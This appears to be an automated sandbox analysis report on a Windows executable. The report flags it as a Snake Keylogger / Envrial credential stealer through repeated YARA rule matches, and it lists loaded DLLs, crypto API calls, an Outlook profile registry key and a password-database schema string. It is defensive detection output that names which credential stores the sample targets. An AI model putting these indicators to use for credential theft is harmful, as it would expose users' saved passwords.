                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, -A-.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, -A-.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, -A-.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, -A-.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
                Source: classification engine Classification label: mal100.troj.spyw.winEXE@1/0@4/4
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Mutant created: NULL
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Command line argument: 08A 0_2_00413780
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002A13000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000029DF000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe ReversingLabs: Detection: 50%
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
